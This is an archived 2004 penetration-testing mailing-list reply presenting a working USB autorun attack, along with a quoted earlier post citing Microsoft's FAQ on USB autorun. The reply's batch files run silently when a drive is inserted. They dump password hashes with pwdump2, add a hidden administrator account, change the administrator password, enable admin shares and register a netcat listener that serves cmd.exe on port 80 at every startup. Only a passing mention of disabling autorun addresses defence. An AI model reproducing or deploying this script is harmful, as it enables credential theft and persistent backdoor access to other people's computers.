Penetration Testing mailing list archives
Re: USB delivered attacks (working example)
From: <mak_pen () hotmail com>
Date: 3 Jun 2004 15:03:11 -0000
In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com> I have been using this "attack" for some time now. below are the batch files (test.bat, b.bat and autorun.inf. autorun.inf calls test.bat)i use: *********<BOF test.bat> @echo off @start /min b.bat /B @exit <EOF test.bat> *********<BOF b.bat> @explorer . @echo off ::Displaying Computer Information for my reference @echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt @Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt ::Adding a user for me :o) @net user /add __system32__ .z,xmcnvb /fullname:"IPC User" @net localgroup Administrators _system32_ /add ::Hide the Account from being shown on the welcome screen @reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t REG_DWORD /d 0 /f ::Enabling Admin Shares @reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 1 /f ::Changing Admin Password @net user administrator .;[pl,mkoijnbhu ::Backdooring @copy nc.exe <nc directory> @cd c: @cd <nc directory> @reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f @echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt @echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt @echo ******************************************** >> Essential\DumpIt\sam.txt @cls @exit <EOF b.bat> I have tried this using a flash memmory and it works. what happens is that it opens explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which i have documented above. to prevent against this i have a registry file i use to disable autorun all together. contact me if you need it at: mak_pen(at)hotmail(dot)com Cheers....
Received: (qmail 20035 invoked from network); 2 Jun 2004 22:23:41 -0000 Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26) by mail.securityfocus.com with SMTP; 2 Jun 2004 22:23:41 -0000 Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) by outgoing2.securityfocus.com (Postfix) with QMQP id 62E8414370A; Thu, 3 Jun 2004 00:26:35 -0600 (MDT) Mailing-List: contact pen-test-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <pen-test.list-id.securityfocus.com> List-Post: <mailto:pen-test () securityfocus com> List-Help: <mailto:pen-test-help () securityfocus com> List-Unsubscribe: <mailto:pen-test-unsubscribe () securityfocus com> List-Subscribe: <mailto:pen-test-subscribe () securityfocus com> Delivered-To: mailing list pen-test () securityfocus com Delivered-To: moderator for pen-test () securityfocus com Received: (qmail 27926 invoked from network); 2 Jun 2004 19:49:38 -0000 X-Originating-IP: [66.130.148.65] X-Originating-Email: [mindedsmasher () hotmail com] X-Sender: mindedsmasher () hotmail com From: "Fred Gravel" <mindedsmasher () hotmail com> To: pen-test () securityfocus com Subject: Re: USB delivered attacks Date: Wed, 02 Jun 2004 20:02:14 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com> X-OriginalArrivalTime: 02 Jun 2004 20:02:14.0500 (UTC) FILETIME=[7FA8F240:01C448DC] And after some search ... autorun is possible on a usb storage device... as it explained just below ... http://www.microsoft.com/whdc/device/storage/usbfaq.mspx Q: What must I do to trigger Autorun on my USB storage device? If you need to make a USB storage device that executes Autorun, the following two conditions must both be true: ? Media must be marked as removable. ? The device can be set to either static or removable. We associate the "removable" nature of a device with the bus that it resides on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus would be regarded as removable by default. PnP uses a bit in the DEVICE_CAPABILITIES structure to determine this. For more information, see the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located at http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp. The "removable" nature of media is a property of the device. For example, in the case of a CD-ROM or a ZIP drive, the medium can be removed without the device itself going away, but on the other hand the medium and the disk cannot be separated on static storage PC cards. We obtain this information by using the StorageDeviceProperty request. For more information, see the STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp. ---- Also the autorun could be used in "cooperation" of the desktop.ini file included in the folder(s) on the usb storage device if needed... _________________________________________________________________ MSN Toolbar provides one-click access to Hotmail from any Web page ? FREE download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/
Current thread:
- Re: USB delivered attacks (working example) mak_pen (Jun 03)